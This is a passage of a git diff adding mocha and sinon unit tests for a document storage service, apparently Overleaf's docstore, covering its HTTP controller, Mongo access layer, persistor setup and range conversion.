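+        // together and starting the revision counter at 1, i.e. roughly:
+        //   upsertIntoDocCollection(projectId, docId, undefined, {
+        //     lines, ranges, version, // rev becomes 1 on insert
+        //   })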
this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + }) + + it('should upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + undefined, + { + lines: this.newDocLines, + ranges: this.originalRanges, + version: this.version, + } + ) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: 1 }) + }) + }) + + describe('when another update is racing', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.MongoManager.promises.upsertIntoDocCollection + .onFirstCall() + .rejects(new Errors.DocRevValueError()) + this.RangeManager.shouldUpdateRanges.returns(true) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version + 1, + this.newRanges + ) + }) + + it('should upsert the doc twice', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + this.rev, + { + ranges: this.newRanges, + lines: this.newDocLines, + version: this.version + 1, + } + ) + this.MongoManager.promises.upsertIntoDocCollection.should.have.been + .calledTwice + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/HttpControllerTests.js b/services/docstore/test/unit/js/HttpControllerTests.js new file mode 100644 index 0000000..bf78696 --- /dev/null +++ b/services/docstore/test/unit/js/HttpControllerTests.js @@ -0,0 +1,578 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/HttpController' +) +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') + +describe('HttpController', function () { + beforeEach(function () { + const settings = { + max_doc_length: 2 * 1024 * 1024, + } + this.DocArchiveManager = { + unArchiveAllDocs: sinon.stub().yields(), + } + this.DocManager = {} + this.HttpController = SandboxedModule.require(modulePath, { + requires: { + './DocManager': this.DocManager, + './DocArchiveManager': this.DocArchiveManager, + '@overleaf/settings': settings, + './HealthChecker': {}, + './Errors': Errors, + }, + }) + this.res = { + send: sinon.stub(), + sendStatus: sinon.stub(), + json: sinon.stub(), + setHeader: sinon.stub(), + } + this.res.status = sinon.stub().returns(this.res) + this.req = { query: {} } + this.next = sinon.stub() + this.projectId = 'mock-project-id' + this.docId = 'mock-doc-id' + this.doc = { + _id: this.docId, + lines: ['mock', 'lines', ' here', '', '', ' spaces '], + version: 42, + rev: 5, + } + this.deletedDoc = { + deleted: true, + _id: this.docId, + lines: ['mock', 'lines', ' here', '', '', ' spaces '], + version: 42, + rev: 5, + } + }) + + describe('getDoc', function () { + describe('without deleted docs', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getFullDoc = sinon + .stub() + .callsArgWith(2, null, this.doc) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should 
get the document with the version (including deleted)', function () { + this.DocManager.getFullDoc + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + _id: this.docId, + lines: this.doc.lines, + rev: this.doc.rev, + version: this.doc.version, + }) + .should.equal(true) + }) + }) + + describe('which is deleted', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getFullDoc = sinon + .stub() + .callsArgWith(2, null, this.deletedDoc) + }) + + it('should get the doc from the doc manager', function () { + this.HttpController.getDoc(this.req, this.res, this.next) + this.DocManager.getFullDoc + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should return 404 if the query string delete is not set ', function () { + this.HttpController.getDoc(this.req, this.res, this.next) + this.res.sendStatus.calledWith(404).should.equal(true) + }) + + it('should return the doc as JSON if include_deleted is set to true', function () { + this.req.query.include_deleted = 'true' + this.HttpController.getDoc(this.req, this.res, this.next) + this.res.json + .calledWith({ + _id: this.docId, + lines: this.doc.lines, + rev: this.doc.rev, + deleted: true, + version: this.doc.version, + }) + .should.equal(true) + }) + }) + }) + + describe('getRawDoc', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getDocLines = sinon.stub().callsArgWith(2, null, this.doc) + this.HttpController.getRawDoc(this.req, this.res, this.next) + }) + + it('should get the document without the version', function () { + this.DocManager.getDocLines + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should set the content type header', function () { + this.res.setHeader + .calledWith('content-type', 'text/plain') + .should.equal(true) + }) + + it('should send the raw version of the doc', function () { + assert.deepEqual( + this.res.send.args[0][0], + `${this.doc.lines[0]}\n${this.doc.lines[1]}\n${this.doc.lines[2]}\n${this.doc.lines[3]}\n${this.doc.lines[4]}\n${this.doc.lines[5]}` + ) + }) + }) + + describe('getAllDocs', function () { + describe('normally', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'one'], + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should get all the (non-deleted) docs', function () { + this.DocManager.getAllNonDeletedDocs + .calledWith(this.projectId, { lines: true, rev: true }) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: this.docs[0].lines, + rev: this.docs[0].rev, + }, + { + _id: this.docs[1]._id.toString(), + lines: this.docs[1].lines, + rev: this.docs[1].rev, + }, + ]) + .should.equal(true) + }) + }) + + describe('with null lines', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: null, + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 
'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should return the doc with fallback lines', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: [], + rev: this.docs[0].rev, + }, + { + _id: this.docs[1]._id.toString(), + lines: this.docs[1].lines, + rev: this.docs[1].rev, + }, + ]) + .should.equal(true) + }) + }) + + describe('with a null doc', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'one'], + rev: 2, + }, + null, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should return the non null docs as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: this.docs[0].lines, + rev: this.docs[0].rev, + }, + { + _id: this.docs[2]._id.toString(), + lines: this.docs[2].lines, + rev: this.docs[2].rev, + }, + ]) + .should.equal(true) + }) + + it('should log out an error', function () { + this.logger.error + .calledWith( + { + err: sinon.match.has('message', 'null doc'), + projectId: this.projectId, + }, + 'encountered null doc' + ) + .should.equal(true) + }) + }) + }) + + describe('getAllRanges', function () { + describe('normally', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + ranges: { mock_ranges: 'one' }, + }, + { + _id: new ObjectId(), + ranges: { mock_ranges: 'two' }, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllRanges(this.req, this.res, this.next) + }) + + it('should get all the (non-deleted) doc ranges', function () { + this.DocManager.getAllNonDeletedDocs + .calledWith(this.projectId, { ranges: true }) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + ranges: this.docs[0].ranges, + }, + { + _id: this.docs[1]._id.toString(), + ranges: this.docs[1].ranges, + }, + ]) + .should.equal(true) + }) + }) + }) + + describe('updateDoc', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + }) + + describe('when the doc lines exist and were updated', function () { + beforeEach(function () { + this.req.body = { + lines: (this.lines = ['hello', 'world']), + version: (this.version = 42), + ranges: (this.ranges = { changes: 'mock' }), + } + this.DocManager.updateDoc = sinon + .stub() + .yields(null, true, (this.rev = 5)) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should update the document', function () { + this.DocManager.updateDoc + .calledWith( + this.projectId, + this.docId, + this.lines, + this.version, + this.ranges + ) + .should.equal(true) + }) + + it('should return a modified status', function () { + this.res.json + .calledWith({ modified: true, rev: this.rev }) + .should.equal(true) + }) + }) + + describe('when the doc lines exist and were not updated', function () { + beforeEach(function () { + this.req.body = { + lines: (this.lines = ['hello', 'world']), + version: 
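+          // Editor's note: `(this.version = 42)` is the fixture idiom used
+          // throughout this suite: it assigns to the test context and
+          // supplies the value in one expression, equivalent to:
+          //   this.version = 42
+          //   this.req.body = { lines: this.lines, version: this.version, ... }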
(this.version = 42),
+          ranges: {},
+        }
+        this.DocManager.updateDoc = sinon
+          .stub()
+          .yields(null, false, (this.rev = 5))
+        this.HttpController.updateDoc(this.req, this.res, this.next)
+      })
+
+      it('should return a modified status', function () {
+        this.res.json
+          .calledWith({ modified: false, rev: this.rev })
+          .should.equal(true)
+      })
+    })
+
+    describe('when the doc lines are not provided', function () {
+      beforeEach(function () {
+        this.req.body = { version: 42, ranges: {} }
+        this.DocManager.updateDoc = sinon.stub().yields(null, false)
+        this.HttpController.updateDoc(this.req, this.res, this.next)
+      })
+
+      it('should not update the document', function () {
+        this.DocManager.updateDoc.called.should.equal(false)
+      })
+
+      it('should return a 400 (bad request) response', function () {
+        this.res.sendStatus.calledWith(400).should.equal(true)
+      })
+    })
+
+    describe('when the doc version is not provided', function () {
+      beforeEach(function () {
+        this.req.body = { lines: ['hello world'], ranges: {} }
+        this.DocManager.updateDoc = sinon.stub().yields(null, false)
+        this.HttpController.updateDoc(this.req, this.res, this.next)
+      })
+
+      it('should not update the document', function () {
+        this.DocManager.updateDoc.called.should.equal(false)
+      })
+
+      it('should return a 400 (bad request) response', function () {
+        this.res.sendStatus.calledWith(400).should.equal(true)
+      })
+    })
+
+    describe('when the doc ranges are not provided', function () {
+      beforeEach(function () {
+        this.req.body = { lines: ['foo'], version: 42 }
+        this.DocManager.updateDoc = sinon.stub().yields(null, false)
+        this.HttpController.updateDoc(this.req, this.res, this.next)
+      })
+
+      it('should not update the document', function () {
+        this.DocManager.updateDoc.called.should.equal(false)
+      })
+
+      it('should return a 400 (bad request) response', function () {
+        this.res.sendStatus.calledWith(400).should.equal(true)
+      })
+    })
+
+    describe('when the doc body is too large', function () {
+      beforeEach(function () {
+        this.req.body = {
+          lines: (this.lines = Array(2049).fill('a'.repeat(1024))),
+          version: (this.version = 42),
+          ranges: (this.ranges = { changes: 'mock' }),
+        }
+        this.HttpController.updateDoc(this.req, this.res, this.next)
+      })
+
+      it('should return a 413 (too large) response', function () {
+        sinon.assert.calledWith(this.res.status, 413)
+      })
+
+      it('should report that the document body is too large', function () {
+        sinon.assert.calledWith(this.res.send, 'document body too large')
+      })
+    })
+  })
+
+  describe('patchDoc', function () {
+    beforeEach(function () {
+      this.req.params = {
+        project_id: this.projectId,
+        doc_id: this.docId,
+      }
+      this.req.body = { name: 'foo.tex' }
+      this.DocManager.patchDoc = sinon.stub().yields(null)
+      this.HttpController.patchDoc(this.req, this.res, this.next)
+    })
+
+    it('should delete the document', function () {
+      expect(this.DocManager.patchDoc).to.have.been.calledWith(
+        this.projectId,
+        this.docId
+      )
+    })
+
+    it('should return a 204 (No Content)', function () {
+      expect(this.res.sendStatus).to.have.been.calledWith(204)
+    })
+
+    describe('with an invalid payload', function () {
+      beforeEach(function () {
+        this.req.body = { cannot: 'happen' }
+
+        this.DocManager.patchDoc = sinon.stub().yields(null)
+        this.HttpController.patchDoc(this.req, this.res, this.next)
+      })
+
+      it('should log a message', function () {
+        expect(this.logger.fatal).to.have.been.calledWith(
+          { field: 'cannot' },
+          'joi validation for pathDoc is broken'
+        )
+      })
+
+      it('should not pass the invalid field 
along', function () { + expect(this.DocManager.patchDoc).to.have.been.calledWith( + this.projectId, + this.docId, + {} + ) + }) + }) + }) + + describe('archiveAllDocs', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.DocArchiveManager.archiveAllDocs = sinon.stub().callsArg(1) + this.HttpController.archiveAllDocs(this.req, this.res, this.next) + }) + + it('should archive the project', function () { + this.DocArchiveManager.archiveAllDocs + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return a 204 (No Content)', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('unArchiveAllDocs', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + }) + + describe('on success', function () { + beforeEach(function (done) { + this.res.sendStatus.callsFake(() => done()) + this.HttpController.unArchiveAllDocs(this.req, this.res, this.next) + }) + + it('returns a 200', function () { + expect(this.res.sendStatus).to.have.been.calledWith(200) + }) + }) + + describe("when the archived rev doesn't match", function () { + beforeEach(function (done) { + this.res.sendStatus.callsFake(() => done()) + this.DocArchiveManager.unArchiveAllDocs.yields( + new Errors.DocRevValueError('bad rev') + ) + this.HttpController.unArchiveAllDocs(this.req, this.res, this.next) + }) + + it('returns a 409', function () { + expect(this.res.sendStatus).to.have.been.calledWith(409) + }) + }) + }) + + describe('destroyProject', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.DocArchiveManager.destroyProject = sinon.stub().callsArg(1) + this.HttpController.destroyProject(this.req, this.res, this.next) + }) + + it('should destroy the docs', function () { + sinon.assert.calledWith( + this.DocArchiveManager.destroyProject, + this.projectId + ) + }) + + it('should return 204', function () { + sinon.assert.calledWith(this.res.sendStatus, 204) + }) + }) +}) diff --git a/services/docstore/test/unit/js/MongoManagerTests.js b/services/docstore/test/unit/js/MongoManagerTests.js new file mode 100644 index 0000000..4f8467d --- /dev/null +++ b/services/docstore/test/unit/js/MongoManagerTests.js @@ -0,0 +1,407 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/MongoManager' +) +const { ObjectId } = require('mongodb-legacy') +const { assert, expect } = require('chai') +const Errors = require('../../../app/js/Errors') + +describe('MongoManager', function () { + beforeEach(function () { + this.db = { + docs: { + updateOne: sinon.stub().resolves({ matchedCount: 1 }), + insertOne: sinon.stub().resolves(), + }, + } + this.MongoManager = SandboxedModule.require(modulePath, { + requires: { + './mongodb': { + db: this.db, + ObjectId, + }, + '@overleaf/settings': { + max_deleted_docs: 42, + docstore: { archivingLockDurationMs: 5000 }, + }, + './Errors': Errors, + }, + }) + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + this.rev = 42 + this.stubbedErr = new Error('hello world') + this.lines = ['Three French hens', 'Two turtle doves'] + }) + + describe('findDoc', function () { + beforeEach(async function () { + this.doc = { name: 'mock-doc' } + this.db.docs.findOne = sinon.stub().resolves(this.doc) + this.filter = { lines: true } + this.result = await this.MongoManager.promises.findDoc( + this.projectId, + 
this.docId,
+        this.filter
+      )
+    })
+
+    it('should find the doc', function () {
+      this.db.docs.findOne
+        .calledWith(
+          {
+            _id: new ObjectId(this.docId),
+            project_id: new ObjectId(this.projectId),
+          },
+          {
+            projection: this.filter,
+          }
+        )
+        .should.equal(true)
+    })
+
+    it('should return the doc', function () {
+      expect(this.result).to.deep.equal(this.doc)
+    })
+  })
+
+  describe('patchDoc', function () {
+    beforeEach(async function () {
+      this.meta = { name: 'foo.tex' }
+      await this.MongoManager.promises.patchDoc(
+        this.projectId,
+        this.docId,
+        this.meta
+      )
+    })
+
+    it('should pass the parameter along', function () {
+      this.db.docs.updateOne.should.have.been.calledWith(
+        {
+          _id: new ObjectId(this.docId),
+          project_id: new ObjectId(this.projectId),
+        },
+        {
+          $set: this.meta,
+        }
+      )
+    })
+  })
+
+  describe('getProjectsDocs', function () {
+    beforeEach(function () {
+      this.filter = { lines: true }
+      this.doc1 = { name: 'mock-doc1' }
+      this.doc2 = { name: 'mock-doc2' }
+      this.doc3 = { name: 'mock-doc3' }
+      this.doc4 = { name: 'mock-doc4' }
+      this.db.docs.find = sinon.stub().returns({
+        toArray: sinon.stub().resolves([this.doc1, this.doc3, this.doc4]),
+      })
+    })
+
+    describe('with included_deleted = false', function () {
+      beforeEach(async function () {
+        this.result = await this.MongoManager.promises.getProjectsDocs(
+          this.projectId,
+          { include_deleted: false },
+          this.filter
+        )
+      })
+
+      it('should find the non-deleted docs via the project_id', function () {
+        this.db.docs.find
+          .calledWith(
+            {
+              project_id: new ObjectId(this.projectId),
+              deleted: { $ne: true },
+            },
+            {
+              projection: this.filter,
+            }
+          )
+          .should.equal(true)
+      })
+
+      it('should return the docs', function () {
+        expect(this.result).to.deep.equal([this.doc1, this.doc3, this.doc4])
+      })
+    })
+
+    describe('with included_deleted = true', function () {
+      beforeEach(async function () {
+        this.result = await this.MongoManager.promises.getProjectsDocs(
+          this.projectId,
+          { include_deleted: true },
+          this.filter
+        )
+      })
+
+      it('should find all via the project_id', function () {
+        this.db.docs.find
+          .calledWith(
+            {
+              project_id: new ObjectId(this.projectId),
+            },
+            {
+              projection: this.filter,
+            }
+          )
+          .should.equal(true)
+      })
+
+      it('should return the docs', function () {
+        expect(this.result).to.deep.equal([this.doc1, this.doc3, this.doc4])
+      })
+    })
+  })
+
+  describe('getProjectsDeletedDocs', function () {
+    beforeEach(async function () {
+      this.filter = { name: true }
+      this.doc1 = { _id: '1', name: 'mock-doc1.tex' }
+      this.doc2 = { _id: '2', name: 'mock-doc2.tex' }
+      this.doc3 = { _id: '3', name: 'mock-doc3.tex' }
+      this.db.docs.find = sinon.stub().returns({
+        toArray: sinon.stub().resolves([this.doc1, this.doc2, this.doc3]),
+      })
+      this.result = await this.MongoManager.promises.getProjectsDeletedDocs(
+        this.projectId,
+        this.filter
+      )
+    })
+
+    it('should find the deleted docs via the project_id', function () {
+      this.db.docs.find
+        .calledWith({
+          project_id: new ObjectId(this.projectId),
+          deleted: true,
+        })
+        .should.equal(true)
+    })
+
+    it('should filter, sort by deletedAt and limit', function () {
+      this.db.docs.find
+        .calledWith(sinon.match.any, {
+          projection: this.filter,
+          sort: { deletedAt: -1 },
+          limit: 42,
+        })
+        .should.equal(true)
+    })
+
+    it('should return the docs', function () {
+      expect(this.result).to.deep.equal([this.doc1, this.doc2, this.doc3])
+    })
+  })
+
+  describe('upsertIntoDocCollection', function () {
+    beforeEach(function () {
+      this.oldRev = 77
+    })
+
+    it('should upsert the 
document', async function () { + await this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + this.oldRev, + { lines: this.lines } + ) + + const args = this.db.docs.updateOne.args[0] + assert.deepEqual(args[0], { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.oldRev, + }) + assert.equal(args[1].$set.lines, this.lines) + assert.equal(args[1].$inc.rev, 1) + }) + + it('should handle update error', async function () { + this.db.docs.updateOne.rejects(this.stubbedErr) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + this.rev, + { + lines: this.lines, + } + ) + ).to.be.rejectedWith(this.stubbedErr) + }) + + it('should insert without a previous rev', async function () { + await this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + + expect(this.db.docs.insertOne).to.have.been.calledWith({ + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: 1, + lines: this.lines, + ranges: this.ranges, + }) + }) + + it('should handle generic insert error', async function () { + this.db.docs.insertOne.rejects(this.stubbedErr) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + ).to.be.rejectedWith(this.stubbedErr) + }) + + it('should handle duplicate insert error', async function () { + this.db.docs.insertOne.rejects({ code: 11000 }) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + + describe('destroyProject', function () { + beforeEach(async function () { + this.projectId = new ObjectId() + this.db.docs.deleteMany = sinon.stub().resolves() + await this.MongoManager.promises.destroyProject(this.projectId) + }) + + it('should destroy all docs', function () { + sinon.assert.calledWith(this.db.docs.deleteMany, { + project_id: this.projectId, + }) + }) + }) + + describe('checkRevUnchanged', function () { + this.beforeEach(function () { + this.doc = { _id: new ObjectId(), name: 'mock-doc', rev: 1 } + }) + + it('should not error when the rev has not changed', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 1 }) + await this.MongoManager.promises.checkRevUnchanged(this.doc) + }) + + it('should return an error when the rev has changed', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 2 }) + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocModifiedError) + }) + + it('should return a value error if incoming rev is NaN', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 2 }) + this.doc = { _id: new ObjectId(), name: 'mock-doc', rev: NaN } + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + + it('should return a value error if checked doc rev is NaN', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: NaN }) + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + + describe('restoreArchivedDoc', function () { + beforeEach(function () { + this.archivedDoc = { + lines: ['a', 'b', 'c'], + ranges: { some: 
'ranges' }, + rev: 2, + } + }) + + describe('complete doc', function () { + beforeEach(async function () { + await this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + }) + + it('updates Mongo', function () { + expect(this.db.docs.updateOne).to.have.been.calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.archivedDoc.rev, + }, + { + $set: { + lines: this.archivedDoc.lines, + ranges: this.archivedDoc.ranges, + }, + $unset: { + inS3: true, + }, + } + ) + }) + }) + + describe('without ranges', function () { + beforeEach(async function () { + delete this.archivedDoc.ranges + await this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + }) + + it('sets ranges to an empty object', function () { + expect(this.db.docs.updateOne).to.have.been.calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.archivedDoc.rev, + }, + { + $set: { + lines: this.archivedDoc.lines, + ranges: {}, + }, + $unset: { + inS3: true, + }, + } + ) + }) + }) + + describe("when the update doesn't succeed", function () { + it('throws a DocRevValueError', async function () { + this.db.docs.updateOne.resolves({ matchedCount: 0 }) + await expect( + this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/PersistorManagerTests.js b/services/docstore/test/unit/js/PersistorManagerTests.js new file mode 100644 index 0000000..8f8ddac --- /dev/null +++ b/services/docstore/test/unit/js/PersistorManagerTests.js @@ -0,0 +1,55 @@ +const { expect } = require('chai') +const modulePath = '../../../app/js/PersistorManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('PersistorManager', function () { + class FakePersistor { + async sendStream() { + return 'sent' + } + } + + describe('configured', function () { + it('should return fake persistor', function () { + const Settings = { + docstore: { + backend: 'gcs', + bucket: 'wombat', + }, + } + const PersistorManger = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + '@overleaf/object-persistor': () => new FakePersistor(), + '@overleaf/metrics': {}, + }, + }) + + expect(PersistorManger).to.be.instanceof(FakePersistor) + expect(PersistorManger.sendStream()).to.eventually.equal('sent') + }) + }) + + describe('not configured', function () { + it('should return abstract persistor', async function () { + const Settings = { + docstore: { + backend: undefined, + bucket: 'wombat', + }, + } + const PersistorManger = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': Settings, + '@overleaf/object-persistor': () => new FakePersistor(), + '@overleaf/metrics': {}, + }, + }) + + expect(PersistorManger.constructor.name).to.equal('AbstractPersistor') + expect(PersistorManger.sendStream()).to.eventually.be.rejectedWith( + /method not implemented in persistor/ + ) + }) + }) +}) diff --git a/services/docstore/test/unit/js/RangeManagerTests.js b/services/docstore/test/unit/js/RangeManagerTests.js new file mode 100644 index 0000000..7a2de73 --- /dev/null +++ b/services/docstore/test/unit/js/RangeManagerTests.js @@ -0,0 +1,253 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. 
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/RangeManager' +) +const { ObjectId } = require('mongodb-legacy') + +describe('RangeManager', function () { + beforeEach(function () { + return (this.RangeManager = SandboxedModule.require(modulePath, { + requires: { + './mongodb': { + ObjectId, + }, + }, + })) + }) + + describe('jsonRangesToMongo', function () { + it('should convert ObjectIds and dates to proper objects', function () { + const changeId = new ObjectId().toString() + const commentId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + const ts = new Date().toJSON() + return this.RangeManager.jsonRangesToMongo({ + changes: [ + { + id: changeId, + op: { i: 'foo', p: 3 }, + metadata: { + user_id: userId, + ts, + }, + }, + ], + comments: [ + { + id: commentId, + op: { c: 'foo', p: 3, t: threadId }, + }, + ], + }).should.deep.equal({ + changes: [ + { + id: new ObjectId(changeId), + op: { i: 'foo', p: 3 }, + metadata: { + user_id: new ObjectId(userId), + ts: new Date(ts), + }, + }, + ], + comments: [ + { + id: new ObjectId(commentId), + op: { c: 'foo', p: 3, t: new ObjectId(threadId) }, + }, + ], + }) + }) + + it('should leave malformed ObjectIds as they are', function () { + const changeId = 'foo' + const commentId = 'bar' + const userId = 'baz' + return this.RangeManager.jsonRangesToMongo({ + changes: [ + { + id: changeId, + metadata: { + user_id: userId, + }, + }, + ], + comments: [ + { + id: commentId, + }, + ], + }).should.deep.equal({ + changes: [ + { + id: changeId, + metadata: { + user_id: userId, + }, + }, + ], + comments: [ + { + id: commentId, + }, + ], + }) + }) + + return it('should be consistent when transformed through json -> mongo -> json', function () { + const changeId = new ObjectId().toString() + const commentId = new ObjectId().toString() + const userId = new ObjectId().toString() + const threadId = new ObjectId().toString() + const ts = new Date().toJSON() + const ranges1 = { + changes: [ + { + id: changeId, + op: { i: 'foo', p: 3 }, + metadata: { + user_id: userId, + ts, + }, + }, + ], + comments: [ + { + id: commentId, + op: { c: 'foo', p: 3, t: threadId }, + }, + ], + } + const ranges1Copy = JSON.parse(JSON.stringify(ranges1)) // jsonRangesToMongo modifies in place + const ranges2 = JSON.parse( + JSON.stringify(this.RangeManager.jsonRangesToMongo(ranges1Copy)) + ) + return ranges1.should.deep.equal(ranges2) + }) + }) + + return describe('shouldUpdateRanges', function () { + beforeEach(function () { + this.ranges = { + changes: [ + { + id: new ObjectId(), + op: { i: 'foo', p: 3 }, + metadata: { + user_id: new ObjectId(), + ts: new Date(), + }, + }, + ], + comments: [ + { + id: new ObjectId(), + op: { c: 'foo', p: 3, t: new ObjectId() }, + }, + ], + } + return (this.ranges_copy = this.RangeManager.jsonRangesToMongo( + JSON.parse(JSON.stringify(this.ranges)) + )) + }) + + describe('with a blank new range', function () { + return it('should throw an error', function () { + return expect(() => { + return this.RangeManager.shouldUpdateRanges(this.ranges, null) + }).to.throw(Error) + }) + }) + + 
describe('with a blank old range', function () { + return it('should treat it like {}', function () { + this.RangeManager.shouldUpdateRanges(null, {}).should.equal(false) + return this.RangeManager.shouldUpdateRanges( + null, + this.ranges + ).should.equal(true) + }) + }) + + describe('with no changes', function () { + return it('should return false', function () { + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(false) + }) + }) + + return describe('with changes', function () { + it('should return true when the change id changes', function () { + this.ranges_copy.changes[0].id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change user id changes', function () { + this.ranges_copy.changes[0].metadata.user_id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change ts changes', function () { + this.ranges_copy.changes[0].metadata.ts = new Date(Date.now() + 1000) + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the change op changes', function () { + this.ranges_copy.changes[0].op.i = 'bar' + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the comment id changes', function () { + this.ranges_copy.comments[0].id = new ObjectId() + return this.RangeManager.shouldUpdateRanges( + this.ranges, + this.ranges_copy + ).should.equal(true) + }) + + it('should return true when the comment offset changes', function () { + this.ranges_copy.comments[0].op.p = 17 + return 